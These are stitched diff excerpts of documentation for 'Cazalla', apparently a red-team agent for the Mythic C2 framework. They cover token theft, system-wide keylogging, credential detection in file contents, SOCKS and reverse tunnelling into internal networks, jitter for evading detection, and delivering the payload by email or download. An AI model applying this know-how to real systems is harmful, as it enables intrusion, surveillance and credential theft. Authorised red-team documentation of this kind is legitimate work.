|
||||
# Interactive operations
|
||||
sleep {"seconds":10,"jitter":10}
|
||||
|
||||
# Stealth mode
|
||||
sleep {"seconds":120,"jitter":40}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Related Documentation
|
||||
|
||||
- [Commands Reference](commands.md) - Detailed command documentation
|
||||
- [OPSEC Guide](opsec.md) - Operational security considerations
|
||||
- [Features Overview](features.md) - Feature explanations
|
||||
- [Getting Started](getting-started.md) - Installation and setup
|
||||
|
||||
---
|
||||
|
||||
**Last Updated:** 2024
|
||||
|
||||
@@ -0,0 +1,449 @@
|
||||
+++
|
||||
title = "Features"
|
||||
chapter = false
|
||||
weight = 10
|
||||
pre = "2. "
|
||||
+++
|
||||
|
||||
# Cazalla Features Overview
|
||||
|
||||
This document provides detailed explanations of Cazalla's key features and capabilities.
|
||||
|
||||
## 📋 Table of Contents
|
||||
|
||||
- [Process Browser Integration](#process-browser-integration)
|
||||
- [File Browser Integration](#file-browser-integration)
|
||||
- [Context Tracking](#context-tracking)
|
||||
- [Artifacts Support](#artifacts-support)
|
||||
- [Credentials Support](#credentials-support)
|
||||
- [SOCKS Proxy Support](#socks-proxy-support)
|
||||
- [Reverse Port Forwarding (RPFWD) Support](#reverse-port-forwarding-rpfwd-support)
|
||||
- [Token Support](#token-support)
|
||||
- [Keylogging Support](#keylogging-support)
|
||||
- [File Downloads Support](#file-downloads-support)
|
||||
- [File Uploads Support](#file-uploads-support)
|
||||
- [OPSEC Checking](#opsec-checking)
|
||||
|
||||
---
|
||||
|
||||
## Process Browser Integration
|
||||
|
||||
Cazalla fully integrates with Mythic's Process Browser feature, providing unified process management across multiple callbacks on the same host.
|
||||
|
||||
### Features
|
||||
|
||||
- **Unified Process Lists**: All process listings from different callbacks on the same host are aggregated
|
||||
- **Process Hierarchy**: View process parent-child relationships when parent process IDs are available
|
||||
- **Rich Process Data**: Includes process name, PID, PPID, architecture, user account, and session ID
|
||||
- **Automatic Synchronization**: Process lists are automatically synchronized with Mythic's Process Browser UI
|
||||
- **Process Actions**: Kill processes, steal tokens, and list tokens directly from the Process Browser UI
|
||||
- **Cache Management**: Process lists automatically clear stale entries using `update_deleted=True` flag
|
||||
|
||||
### How It Works
|
||||
|
||||
1. **Execute `ps` command**: The agent enumerates all running processes
|
||||
2. **Translator Conversion**: The translator automatically converts the process list to Mythic's Process Browser JSON format
|
||||
3. **UI Update**: Processes appear in the Process Browser UI with all details
|
||||
4. **Interactive Actions**: You can perform actions directly from the UI:
|
||||
- **Kill**: Terminate a process (uses `kill` command)
|
||||
- **Steal Token**: Steal token from a process (uses `steal_token` command)
|
||||
- **List Tokens**: List tokens from a process (uses `list_tokens` command)
|
||||
|
||||
### Accessing Process Browser
|
||||
|
||||
1. Navigate to a callback in the Mythic UI
|
||||
2. Click the **PROCESSES** tab (next to the **CALLBACK** tab)
|
||||
3. View all processes from all callbacks on that host
|
||||
4. Use UI buttons for process actions
|
||||
|
||||
### Implementation Details
|
||||
|
||||
- **`ps` Command**: Implements `process_browser:list` supported UI feature
|
||||
- **`kill` Command**: Implements `process_browser:kill` supported UI feature
|
||||
- **Process Data Format**: Includes PID, process name, PPID, architecture, user, session ID
|
||||
- **Automatic Cache Clearing**: All processes marked with `update_deleted=True` to clear stale entries
|
||||
|
||||
---
|
||||
|
||||
## File Browser Integration
|
||||
|
||||
Cazalla seamlessly integrates with Mythic's File Browser, allowing visual file system navigation and operations.
|
||||
|
||||
### Features
|
||||
|
||||
- **Visual Navigation**: Browse directories and files visually through the Mythic UI
|
||||
- **Drag-and-Drop Downloads**: Download files with a simple click
|
||||
- **Upload Integration**: Upload files directly from the File Browser interface
|
||||
- **Automatic Path Resolution**: Relative paths are automatically resolved using the current working directory
|
||||
- **Real-time Updates**: File listings update automatically as you navigate
|
||||
|
||||
### How It Works
|
||||
|
||||
1. **Execute `ls` command**: The agent lists directory contents
|
||||
2. **Translator Conversion**: The translator converts the listing to Mythic's File Browser format
|
||||
3. **UI Display**: Files and directories appear in the File Browser UI
|
||||
4. **Interactive Operations**: Perform file operations directly from the UI:
|
||||
- **Download**: Click file → Download
|
||||
- **Upload**: Right-click directory → Upload
|
||||
- **Delete**: Right-click file → Delete (uses `rm` command)
|
||||
|
||||
### Accessing File Browser
|
||||
|
||||
1. Navigate to a callback in the Mythic UI
|
||||
2. Click the **Files** icon in the top navigation
|
||||
3. Browse directories and files visually
|
||||
4. Perform operations directly from the UI
|
||||
|
||||
### Path Handling
|
||||
|
||||
- **Relative Paths**: Automatically resolved using the current working directory
|
||||
- **Absolute Paths**: Full paths work as expected
|
||||
- **Path Normalization**: Double backslashes and invalid characters are automatically handled
|
||||
|
||||
---
|
||||
|
||||
## Context Tracking
|
||||
|
||||
Cazalla automatically tracks and displays dynamic callback context information in the Mythic UI.
|
||||
|
||||
### Features
|
||||
|
||||
- **Current Working Directory**: Displays the agent's current directory
|
||||
- **Impersonation Context**: Shows the currently impersonated user (if any)
|
||||
- **Real-time Updates**: Context tabs update automatically as the agent's state changes
|
||||
- **Visual Display**: Context information appears as tabs above the tasking area
|
||||
|
||||
### Supported Context Fields
|
||||
|
||||
#### Current Working Directory (`cwd`)
|
||||
|
||||
- **Updated by**: `cd` command
|
||||
- **Initial value**: Automatically set during check-in
|
||||
- **Display**: Shows the current directory path (e.g., `C:\Users\localuser\Downloads`)
|
||||
|
||||
#### Impersonation Context (`impersonation_context`)
|
||||
|
||||
- **Updated by**: `steal_token`, `make_token`, `rev2self`
|
||||
- **Initial value**: Automatically set during check-in with the process's current user
|
||||
- **Display**: Shows the currently impersonated user (e.g., `NT AUTHORITY\SYSTEM`)
|
||||
|
||||
### Commands That Update Context
|
||||
|
||||
- **`cd`**: Updates `cwd` when directory changes
|
||||
- **`steal_token`**: Updates `impersonation_context` when token is stolen
|
||||
- **`make_token`**: Updates `impersonation_context` when token is created
|
||||
- **`rev2self`**: Clears `impersonation_context` when reverting to original token
|
||||
|
||||
---
|
||||
|
||||
## Artifacts Support
|
||||
|
||||
Cazalla automatically reports artifacts created during command execution, allowing Mythic to track forensic evidence.
|
||||
|
||||
### Features
|
||||
|
||||
- **Automatic Detection**: Artifacts are automatically reported for relevant commands
|
||||
- **Multiple Artifact Types**: Supports Process Create, File Write, File Delete, File Read, Process Termination, API Call, Network Connection
|
||||
- **Artifact Management**: Artifacts appear in Mythic's Artifacts page
|
||||
- **Extensible**: Easy to add artifact reporting for new commands
|
||||
|
||||
### Supported Artifact Types
|
||||
|
||||
| Artifact Type | Commands | Description |
|
||||
|--------------|----------|-------------|
|
||||
| **Process Create** | `shell` | Command execution via cmd.exe |
|
||||
| **File Write** | `cp`, `mkdir`, `upload` | File creation or modification |
|
||||
| **File Delete** | `rm` | File or directory deletion |
|
||||
| **File Read** | `download` | File download operations |
|
||||
| **Process Termination** | `kill` | Process termination with PID |
|
||||
| **API Call** | `screenshot`, `keylog_start` | API usage for screen capture/keylogging |
|
||||
| **Network Connection** | `rpfwd start` | Reverse port forward listener |
|
||||
|
||||
### Viewing Artifacts
|
||||
|
||||
1. Navigate to your callback in the Mythic UI
|
||||
2. Click the **Artifacts** icon (fingerprint) in the top navigation
|
||||
3. View all artifacts created by commands
|
||||
4. Filter by artifact type, needs cleanup, resolved status
|
||||
|
||||
---
|
||||
|
||||
## Credentials Support
|
||||
|
||||
Cazalla supports reporting discovered credentials to Mythic's credential store.
|
||||
|
||||
### Features
|
||||
|
||||
- **Automatic Detection**: Commands can report discovered credentials
|
||||
- **Multiple Credential Types**: Supports `plaintext`, `hash`, `certificate`, `key`, `ticket`, `cookie`
|
||||
- **Credential Management**: Credentials appear in Mythic's Credentials page
|
||||
- **Associated with Tasks**: Credentials are linked to the task and callback that discovered them
|
||||
|
||||
### Credential Detection in `cat` Command
|
||||
|
||||
The `cat` command automatically detects and reports credentials from file contents:
|
||||
|
||||
- **Format `username:password`**: `marcos:password123`
|
||||
- **Format `domain\username:password`**: `test\marcos:password`
|
||||
- **Format `username@domain:password`**: `marcos@tes.com:password`
|
||||
- **Passwords in config files**: `password=value` or `password:value`
|
||||
- **HTTP URLs with credentials**: `http://user:pass@host`
|
||||
- **NTLM hashes**: Format `aad3b435b51404ee:hash` or `:32hexchars`
|
||||
|
||||
### Viewing Credentials
|
||||
|
||||
1. Navigate to your callback in the Mythic UI
|
||||
2. Click the **CREDENTIALS** icon (key) in the top navigation
|
||||
3. View all credentials discovered by commands
|
||||
4. Filter by credential type, realm, account
|
||||
|
||||
---
|
||||
|
||||
## SOCKS Proxy Support
|
||||
|
||||
Cazalla includes full SOCKS5 proxy support, allowing you to route traffic through the agent to access internal network resources.
|
||||
|
||||
### Features
|
||||
|
||||
- **SOCKS5 Protocol**: Full SOCKS5 proxy server support
|
||||
- **Multiple Connections**: Supports multiple simultaneous SOCKS connections
|
||||
- **Dynamic Sleep**: Automatically reduces sleep interval when SOCKS is active
|
||||
- **Connection Tracking**: Each connection has a unique `server_id` for tracking
|
||||
|
||||
### How It Works
|
||||
|
||||
1. **Mythic opens a SOCKS port** on the server (default: `7002`)
|
||||
2. **Client connects** to Mythic's SOCKS port (e.g., via `proxychains`)
|
||||
3. **Mythic forwards** SOCKS traffic to the agent with a unique `server_id` per connection
|
||||
4. **Agent establishes** the actual connection to the target host
|
||||
5. **Bidirectional relay** between client ↔ Mythic ↔ Agent ↔ Target
|
||||
|
||||
### Using the Proxy
|
||||
|
||||
```bash
|
||||
# Start SOCKS proxy
|
||||
socks {"action":"start","port":7002}
|
||||
|
||||
# Configure proxychains
|
||||
# Edit /etc/proxychains.conf
|
||||
[ProxyList]
|
||||
socks5 <mythic_server_ip> 7002
|
||||
|
||||
# Use with any tool
|
||||
proxychains curl https://internal-server.local
|
||||
proxychains nmap -sT 192.168.1.0/24
|
||||
```
|
||||
|
||||
### Performance Considerations
|
||||
|
||||
- **Latency**: Proxy speed depends on beacon interval. SOCKS mode automatically reduces sleep to 100ms
|
||||
- **Throughput**: Suitable for interactive sessions and moderate data transfer
|
||||
- **Concurrent Connections**: Supports multiple simultaneous SOCKS connections
|
||||
|
||||
---
|
||||
|
||||
## Reverse Port Forwarding (RPFWD) Support
|
||||
|
||||
Cazalla includes reverse port forwarding (RPFWD) support, allowing you to tunnel incoming connections from the agent to a remote destination through Mythic.
|
||||
|
||||
### Features
|
||||
|
||||
- **Reverse Tunneling**: Connections originate from external clients to the agent
|
||||
- **Remote Destination**: Forwards connections to configured remote destinations
|
||||
- **Multiple Connections**: Supports multiple simultaneous RPFWD connections
|
||||
- **Automatic Cleanup**: Closed connections are automatically cleaned up
|
||||
|
||||
### How It Works
|
||||
|
||||
1. **Agent opens a listener** on a local port (e.g., `8080` on the agent host)
|
||||
2. **External client connects** to the agent's listener port
|
||||
3. **Agent sends connection data** to Mythic via RPFWD protocol
|
||||
4. **Mythic connects** to the configured remote destination (`remote_host:remote_port`)
|
||||
5. **Bidirectional relay** between client ↔ Agent ↔ Mythic ↔ Remote destination
|
||||
|
||||
### Use Cases
|
||||
|
||||
- **Access internal services**: Expose internal services (e.g., database, web server)
|
||||
- **Bypass firewall restrictions**: When you can't connect from Mythic but can connect to the agent
|
||||
- **Service tunneling**: Tunnel arbitrary TCP services through the agent
|
||||
|
||||
### Example
|
||||
|
||||
```bash
|
||||
# Start reverse port forward
|
||||
rpfwd {"action":"start","port":8080,"remote_host":"192.168.1.100","remote_port":80}
|
||||
|
||||
# Connect to agent:8080 will forward to 192.168.1.100:80
|
||||
curl http://<agent_ip>:8080
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Token Support
|
||||
|
||||
Cazalla supports Windows token manipulation and impersonation, following Mythic's Token specification.
|
||||
|
||||
### Features
|
||||
|
||||
- **Token Listing**: Enumerate all viewable tokens from running processes
|
||||
- **Token Theft**: Steal tokens from processes to impersonate different users
|
||||
- **Token Creation**: Create new tokens using credentials (domain, username, password)
|
||||
- **Token Impersonation**: Impersonate tokens for subsequent tasking
|
||||
- **Token Revert**: Revert to original token when done impersonating
|
||||
- **SeDebugPrivilege**: Automatically enables `SeDebugPrivilege` for accessing system processes
|
||||
- **Mythic Integration**: Tokens are tracked in Mythic's Token UI and can be selected for tasking
|
||||
|
||||
### Token Commands
|
||||
|
||||
- **`list_tokens`**: Enumerate all available tokens
|
||||
- **`steal_token <pid>`**: Steal token from a process
|
||||
- **`make_token domain username password`**: Create token from credentials
|
||||
- **`rev2self`**: Revert to original token
|
||||
- **`whoami`**: Display current security context
|
||||
|
||||
### Using Tokens for Tasking
|
||||
|
||||
1. Execute `list_tokens` to see available tokens
|
||||
2. Execute `steal_token <pid>` to steal a token (or use `make_token` to create one)
|
||||
3. In the Mythic UI, a dropdown appears next to the tasking bar
|
||||
4. Select a token from the dropdown before issuing commands
|
||||
5. Commands will execute with the selected token's security context
|
||||
|
||||
---
|
||||
|
||||
## Keylogging Support
|
||||
|
||||
Cazalla supports capturing keystrokes from the target system and reporting them to Mythic's Keylogs feature.
|
||||
|
||||
### Features
|
||||
|
||||
- **Window-Aware Keylogging**: Captures keystrokes along with the active window title
|
||||
- **User Context**: Includes the username in each keylog entry
|
||||
- **Process-Agnostic**: Works with any application (Notepad, browsers, terminals, etc.)
|
||||
- **Automatic Buffering**: Buffers keystrokes and sends them periodically (every 3 seconds or 128 bytes)
|
||||
- **Background Thread**: Runs as a separate thread, allowing other commands to execute while keylogging
|
||||
|
||||
### How It Works
|
||||
|
||||
1. **Start Keylogging**: Execute `keylog_start`
|
||||
2. **Background Thread**: Agent creates a background thread that monitors keyboard input
|
||||
3. **Keystroke Capture**: Uses `GetAsyncKeyState` to detect key presses
|
||||
4. **Window Detection**: Captures the active window title
|
||||
5. **Periodic Transmission**: Sends keystrokes every 3 seconds or when buffer reaches 128 bytes
|
||||
6. **Stop Keylogging**: Execute `keylog_stop` to terminate the keylogger
|
||||
|
||||
### Universal Process Support
|
||||
|
||||
The keylogger works with **any Windows application** because it:
|
||||
- Uses `GetForegroundWindow()` to get the currently active window
|
||||
- Captures keystrokes system-wide using `GetAsyncKeyState`
|
||||
- Doesn't require injection into specific processes
|
||||
|
||||
### Viewing Keylogs
|
||||
|
||||
1. Navigate to your callback in the Mythic UI
|
||||
2. Click the **KEYLOGS** tab in the top navigation
|
||||
3. View all captured keystrokes grouped by task, user, window, and timestamp
|
||||
|
||||
---
|
||||
|
||||
## File Downloads Support
|
||||
|
||||
Cazalla supports downloading files from the target to the Mythic server using chunked transfers.
|
||||
|
||||
### Features
|
||||
|
||||
- **Chunked File Transfers**: Large files are automatically split into chunks (512KB default)
|
||||
- **Automatic Registration**: Files are automatically registered with Mythic before transfer
|
||||
- **Progress Tracking**: Mythic tracks download progress (chunks received/total chunks)
|
||||
- **File Read Artifacts**: Automatically reports File Read artifacts when files are downloaded
|
||||
- **Full Path Tracking**: Reports full file paths for proper tracking
|
||||
|
||||
### How It Works
|
||||
|
||||
1. **Command Execution**: Execute `download C:\path\to\file.txt`
|
||||
2. **File Registration**: Agent sends file metadata to Mythic
|
||||
3. **Chunk Transfer**: Agent sends file data in chunks (base64-encoded)
|
||||
4. **Completion**: File appears in Mythic's file browser once all chunks are received
|
||||
|
||||
### Download Process
|
||||
|
||||
- **Chunk Size**: 512KB per chunk (configurable)
|
||||
- **File Size Limit**: Supports files up to 2GB (can be extended)
|
||||
- **Base64 Encoding**: Chunk data is base64-encoded before transmission
|
||||
- **Artifact Reporting**: Automatically reports "File Read" artifact
|
||||
|
||||
---
|
||||
|
||||
## File Uploads Support
|
||||
|
||||
Cazalla supports uploading files from the Mythic server to the target using chunked transfers.
|
||||
|
||||
### Features
|
||||
|
||||
- **Chunked File Transfers**: Large files are automatically split into chunks (512KB default)
|
||||
- **Automatic Path Normalization**: Automatically handles path formatting
|
||||
- **Smart Path Handling**: Automatically appends filename when path is a directory
|
||||
- **File Browser Integration**: Fully integrated with Mythic's File Browser UI
|
||||
- **Progress Tracking**: Mythic tracks upload progress (chunks sent/total chunks)
|
||||
- **File Write Artifacts**: Automatically reports File Write artifacts
|
||||
|
||||
### How It Works
|
||||
|
||||
1. **Command Execution**: Execute `upload <file_id> C:\path\to\destination.txt`
|
||||
2. **Path Normalization**: Agent normalizes the destination path
|
||||
3. **Chunk Requests**: Agent requests file chunks from Mythic sequentially
|
||||
4. **Chunk Writing**: Agent decodes and writes chunks to the destination file
|
||||
5. **Completion**: File Write artifact is reported when complete
|
||||
|
||||
### Path Handling
|
||||
|
||||
- **Normalization**: Automatically normalizes double backslashes
|
||||
- **Directory Detection**: Automatically detects directories and appends filename
|
||||
- **Parent Directory Creation**: Automatically creates parent directories if they don't exist
|
||||
- **Error Handling**: Clear error messages for invalid paths, access denied, etc.
|
||||
|
||||
---
|
||||
|
||||
## OPSEC Checking
|
||||
|
||||
Cazalla includes comprehensive OPSEC Checking functionality that provides operational security warnings and blocking for commands based on their detection risks.
|
||||
|
||||
### Features
|
||||
|
||||
- **Pre-execution Blocking**: Commands can be blocked before execution
|
||||
- **Post-execution Warnings**: Artifacts are automatically tracked and warned about
|
||||
- **Customizable Bypass Roles**: Configure who can approve blocked tasks
|
||||
- **Detailed Warnings**: Comprehensive explanations of OPSEC risks
|
||||
|
||||
### How It Works
|
||||
|
||||
1. **OPSEC Pre-Check (`opsec_pre`)**: Runs before task creation, can block execution
|
||||
2. **OPSEC Post-Check (`opsec_post`)**: Runs after task creation, warns about artifacts
|
||||
|
||||
### Commands with OPSEC Checking
|
||||
|
||||
- **High-Risk Commands (Blocking)**: `shell`, `steal_token`, `kill`, `keylog_start`, `rm` (system files)
|
||||
- **Warning-Only Commands**: `screenshot`, `rpfwd`, `socks`, `download`, `upload`, `make_token`, etc.
|
||||
|
||||
### Bypass Roles
|
||||
|
||||
- **`operator`**: Any operator can bypass
|
||||
- **`other_operator`**: Requires approval from a different operator
|
||||
- **`lead`**: Only operation lead can approve
|
||||
|
||||
For detailed information, see [OPSEC Guide](opsec.md).
|
||||
|
||||
---
|
||||
|
||||
## Related Documentation
|
||||
|
||||
- [Commands Reference](commands.md) - Detailed command documentation
|
||||
- [OPSEC Guide](opsec.md) - Operational security considerations
|
||||
- [Usage Examples](examples.md) - Practical examples
|
||||
- [Getting Started](getting-started.md) - Installation and setup
|
||||
|
||||
---
|
||||
|
||||
**Last Updated:** 2024
|
||||
|
||||
@@ -0,0 +1,356 @@
|
||||
+++
|
||||
title = "Getting started"
|
||||
chapter = false
|
||||
weight = 10
|
||||
pre = "1. "
|
||||
+++
|
||||
|
||||
# Getting Started with Cazalla
|
||||
|
||||
This guide will help you install, configure, and deploy your first Cazalla agent.
|
||||
|
||||
## 📋 Prerequisites
|
||||
|
||||
- **Mythic Server** (v3.x or later) installed and running
|
||||
- Docker installed and running (for building the agent)
|
||||
- Access to a Windows target for testing
|
||||
- Basic understanding of Mythic C2 Framework
|
||||
|
||||
## 🚀 Installation
|
||||
|
||||
### Step 1: Install Cazalla on Mythic
|
||||
|
||||
#### Option A: Install from GitHub (if available)
|
||||
|
||||
```bash
|
||||
cd ~/Mythic
|
||||
./mythic-cli install github https://github.com/<your-org>/Cazalla
|
||||
```
|
||||
|
||||
#### Option B: Install from Local Directory
|
||||
|
||||
```bash
|
||||
cd ~/Mythic
|
||||
./mythic-cli install folder /path/to/Cazalla
|
||||
```
|
||||
|
||||
After installation, Mythic will build the Cazalla container automatically.
|
||||
|
||||
### Step 2: Verify Installation
|
||||
|
||||
Check that Cazalla is installed:
|
||||
|
||||
```bash
|
||||
cd ~/Mythic
|
||||
./mythic-cli list
|
||||
```
|
||||
|
||||
You should see `cazalla` in the list of installed payload types.
|
||||
|
||||
### Step 3: Build Your First Payload
|
||||
|
||||
1. **Navigate to Mythic UI**
|
||||
- Open your browser and go to your Mythic server URL (typically `https://localhost:17443`)
|
||||
|
||||
2. **Create a New Payload**
|
||||
- Click on **Payloads** in the left sidebar
|
||||
- Click **Create Payload** button
|
||||
- Select **Cazalla** as the payload type
|
||||
|
||||
3. **Configure Build Parameters**
|
||||
- **C2 Profile**: Select your configured C2 profile (HTTP, HTTPS, etc.)
|
||||
- **Callback Host**: Your Mythic server's IP address or domain
|
||||
- **Callback Port**: Port for agent communication (default: 443)
|
||||
- **Sleep**: Initial beacon interval in seconds (default: 10)
|
||||
- **Jitter**: Random delay percentage (0-100, recommended: 10-30)
|
||||
- **User Agent**: HTTP User-Agent string for HTTP(S) profiles
|
||||
|
||||
4. **Optional: Enable Encryption**
|
||||
- In the **AESPSK** parameter section:
|
||||
- Set `crypto_type` to `aes256_hmac`
|
||||
- Mythic will automatically generate an encryption key
|
||||
- This provides end-to-end encryption beyond HTTPS
|
||||
|
||||
5. **Build the Payload**
|
||||
- Click the **Build** button
|
||||
- Wait for the build to complete (this may take a few minutes)
|
||||
- Once complete, download the generated `.exe` file
|
||||
|
||||
## 🎯 Deploying the Agent
|
||||
|
||||
### Step 1: Transfer to Target
|
||||
|
||||
Transfer the compiled `.exe` file to your Windows target using any method:
|
||||
- USB drive
|
||||
- Network share
|
||||
- Email attachment
|
||||
- Web download
|
||||
- Etc.
|
||||
|
||||
### Step 2: Execute on Target
|
||||
|
||||
On the Windows target, execute the agent:
|
||||
|
||||
```cmd
|
||||
C:\path\to\cazalla.exe
|
||||
```
|
||||
|
||||
The agent will start beaconing to your Mythic server immediately.
|
||||
|
||||
### Step 3: Verify Connection
|
||||
|
||||
1. **Check Mythic UI**
|
||||
- Navigate to **Callbacks** in the left sidebar
|
||||
- You should see a new callback appear with:
|
||||
- **Hostname**: The target machine's hostname
|
||||
- **User**: The username running the agent
|
||||
- **PID**: Process ID of the agent
|
||||
- **Status**: Active (green indicator)
|
||||
|
||||
2. **Check Agent Output** (if running interactively)
|
||||
- The agent will output connection status
|
||||
- Look for successful connection messages
|
||||
|
||||
## ✅ First Commands
|
||||
|
||||
Once your agent is connected, try these basic commands:
|
||||
|
||||
### 1. Check Current Directory
|
||||
|
||||
```
|
||||
pwd
|
||||
```
|
||||
|
||||
This will show the current working directory of the agent.
|
||||
|
||||
### 2. List Files
|
||||
|
||||
```
|
||||
ls
|
||||
```
|
||||
|
||||
Or list a specific directory:
|
||||
|
||||
```
|
||||
ls C:\Users
|
||||
```
|
||||
|
||||
### 3. Get System Information
|
||||
|
||||
```
|
||||
ps
|
||||
```
|
||||
|
||||
This lists all running processes and updates the Process Browser.
|
||||
|
||||
```
|
||||
whoami
|
||||
```
|
||||
|
||||
This shows the current security context (username and domain).
|
||||
|
||||
### 4. Explore the File System
|
||||
|
||||
```
|
||||
cd C:\Users
|
||||
ls
|
||||
cat desktop.ini
|
||||
```
|
||||
|
||||
## 🔧 Configuration Options
|
||||
|
||||
### Build Parameters
|
||||
|
||||
When building a payload, you can configure:
|
||||
|
||||
| Parameter | Description | Default | Notes |
|
||||
|-----------|-------------|---------|-------|
|
||||
| **Callback Host** | Mythic server address | Required | IP or domain |
|
||||
| **Callback Port** | C2 port | 443 | Must match C2 profile |
|
||||
| **Sleep** | Beacon interval (seconds) | 10 | Lower = more responsive, higher = more stealthy |
|
||||
| **Jitter** | Random delay (%) | 0 | 0-100, recommended 10-30 |
|
||||
| **User Agent** | HTTP User-Agent | Varies | For HTTP(S) profiles |
|
||||
| **AESPSK** | Encryption settings | Disabled | Optional end-to-end encryption |
|
||||
|
||||
### Dynamic Configuration
|
||||
|
||||
After deployment, you can change certain settings:
|
||||
|
||||
#### Adjust Sleep Interval
|
||||
|
||||
```
|
||||
sleep {"seconds":30,"jitter":10}
|
||||
```
|
||||
|
||||
This changes the beacon interval to 30 seconds with 10% jitter.
|
||||
|
||||
#### View Current Settings
|
||||
|
||||
The agent tracks and reports:
|
||||
- Current working directory (via `pwd` or in UI context tabs)
|
||||
- Active token impersonation (via `whoami` or in UI context tabs)
|
||||
- Sleep interval (shown in callback details)
|
||||
|
||||
## 🎨 Using the Mythic UI
|
||||
|
||||
### Process Browser
|
||||
|
||||
1. **Access Process Browser**
|
||||
- Click **Process Browser** in the left sidebar
|
||||
- Or use the process icon in the callback view
|
||||
|
||||
2. **View Processes**
|
||||
- All processes from all callbacks are displayed
|
||||
- Use `ps` command to refresh the process list
|
||||
- Click on processes to view details
|
||||
|
||||
3. **Interact with Processes**
|
||||
- **Kill**: Right-click → Kill Process
|
||||
- **Steal Token**: Right-click → Steal Token
|
||||
- **List Tokens**: Right-click → List Tokens
|
||||
|
||||
### File Browser
|
||||
|
||||
1. **Access File Browser**
|
||||
- Click **File Browser** in the left sidebar
|
||||
- Or use the file icon in the callback view
|
||||
|
||||
2. **Navigate Files**
|
||||
- Browse directories visually
|
||||
- Click on files to download
|
||||
- Right-click to upload files
|
||||
|
||||
3. **File Operations**
|
||||
- **Download**: Click file → Download
|
||||
- **Upload**: Right-click directory → Upload
|
||||
- **Delete**: Right-click file → Delete (uses `rm` command)
|
||||
|
||||
### Context Tracking
|
||||
|
||||
The Mythic UI automatically displays:
|
||||
- **Current Directory**: Shows in callback context tabs
|
||||
- **Impersonation Context**: Shows active token impersonation
|
||||
- **Process Context**: Shows active process information
|
||||
|
||||
## 🔒 Security Considerations
|
||||
|
||||
### OPSEC Checking
|
||||
|
||||
Cazalla includes built-in OPSEC checking for high-risk operations:
|
||||
|
||||
- **Pre-execution blocking**: Commands like `steal_token`, `shell`, `keylog_start` require approval
|
||||
- **Post-execution warnings**: Artifacts are automatically tracked
|
||||
- **Bypass roles**: Configured operators can bypass warnings
|
||||
|
||||
When executing a risky command:
|
||||
1. You'll see an OPSEC warning popup
|
||||
2. Review the warning message
|
||||
3. Approve or cancel the operation
|
||||
4. Another operator may need to approve (if configured)
|
||||
|
||||
See [OPSEC Guide](opsec.md) for detailed information.
|
||||
|
||||
### Best Practices
|
||||
|
||||
1. **Start with High Sleep Values**
|
||||
- Use 30-60 seconds initially
|
||||
- Reduce only when needed for interactive operations
|
||||
|
||||
2. **Use Jitter**
|
||||
- Add 10-30% jitter to avoid predictable patterns
|
||||
- Helps evade timing-based detection
|
||||
|
||||
3. **Monitor Artifacts**
|
||||
- Check the **Artifacts** tab regularly
|
||||
- Review what the agent is creating/accessing
|
||||
|
||||
4. **Use Built-in Commands**
|
||||
- Prefer Cazalla commands (`ps`, `ls`, `cat`) over `shell` when possible
|
||||
- Built-in commands have better OPSEC
|
||||
|
||||
5. **Review OPSEC Warnings**
|
||||
- Always read OPSEC popup messages
|
||||
- Understand risks before approving
|
||||
|
||||
## 🐛 Troubleshooting
|
||||
|
||||
### Agent Not Connecting
|
||||
|
||||
1. **Check Network Connectivity**
|
||||
- Verify target can reach Mythic server
|
||||
- Test: `ping <mythic_server_ip>`
|
||||
- Test: `curl https://<mythic_server>:443`
|
||||
|
||||
2. **Check C2 Profile**
|
||||
- Verify C2 profile is active
|
||||
- Check that port matches callback configuration
|
||||
- Review C2 profile logs
|
||||
|
||||
3. **Check Agent Execution**
|
||||
- Verify agent is running: `tasklist | findstr cazalla`
|
||||
- Check for error messages in console
|
||||
- Review Windows Event Logs
|
||||
|
||||
4. **Check Mythic Logs**
|
||||
```bash
|
||||
sudo docker logs mythic_server
|
||||
sudo docker logs cazalla_translator
|
||||
```
|
||||
|
||||
### Commands Not Working
|
||||
|
||||
1. **Verify Agent is Active**
|
||||
- Check callback status (should be green)
|
||||
- Verify last check-in time
|
||||
|
||||
2. **Check Command Syntax**
|
||||
- Review command documentation in [Commands Reference](commands.md)
|
||||
- Verify parameter format (JSON vs string)
|
||||
|
||||
3. **Review Task Output**
|
||||
- Check task output for error messages
|
||||
- Look for specific error codes
|
||||
|
||||
4. **Check Permissions**
|
||||
- Some commands require specific permissions
|
||||
- Use `whoami` to verify current context
|
||||
|
||||
### Build Issues
|
||||
|
||||
1. **Check Docker**
|
||||
```bash
|
||||
sudo docker ps
|
||||
sudo docker logs cazalla_translator
|
||||
```
|
||||
|
||||
2. **Rebuild Container**
|
||||
```bash
|
||||
cd ~/Mythic
|
||||
sudo ./mythic-cli build cazalla
|
||||
```
|
||||
|
||||
3. **Check Build Parameters**
|
||||
- Verify all required parameters are set
|
||||
- Check parameter format (JSON vs string)
|
||||
|
||||
For more troubleshooting help, see [Troubleshooting Guide](troubleshooting.md).
|
||||
|
||||
## 📚 Next Steps
|
||||
|
||||
Now that you have a working agent:
|
||||
|
||||
1. **Explore Commands**: See [Commands Reference](commands.md) for all available commands
|
||||
2. **Learn Features**: Read [Features Overview](features.md) for advanced capabilities
|
||||
3. **Understand OPSEC**: Review [OPSEC Guide](opsec.md) for security best practices
|
||||
4. **Try Examples**: Check [Usage Examples](examples.md) for practical scenarios
|
||||
|
||||
## 🔗 Additional Resources
|
||||
|
||||
- [Mythic Documentation](https://docs.mythic-c2.net/)
|
||||
- [Mythic Process Browser](https://docs.mythic-c2.net/customizing/hooking-features/process_list)
|
||||
- [Cazalla Main README](../README.md)
|
||||
|
||||
---
|
||||
|
||||
**Ready to use Cazalla?** Start with the [Commands Reference](commands.md) to learn all available commands!
|
||||
|
||||
@@ -0,0 +1,449 @@
|
||||
+++
|
||||
title = "OPSEC"
|
||||
chapter = false
|
||||
weight = 10
|
||||
pre = "3. "
|
||||
+++
|
||||
|
||||
# OPSEC Guide for Cazalla
|
||||
|
||||
This guide covers operational security considerations when using Cazalla agent, including detection risks, best practices, and the built-in OPSEC checking system.
|
||||
|
||||
## 📋 Table of Contents
|
||||
|
||||
- [Overview](#overview)
|
||||
- [OPSEC Checking System](#opsec-checking-system)
|
||||
- [Command Risk Assessment](#command-risk-assessment)
|
||||
- [Detection Avoidance](#detection-avoidance)
|
||||
- [Best Practices](#best-practices)
|
||||
- [OPSEC by Command](#opsec-by-command)
|
||||
|
||||
---
|
||||
|
||||
## Overview
|
||||
|
||||
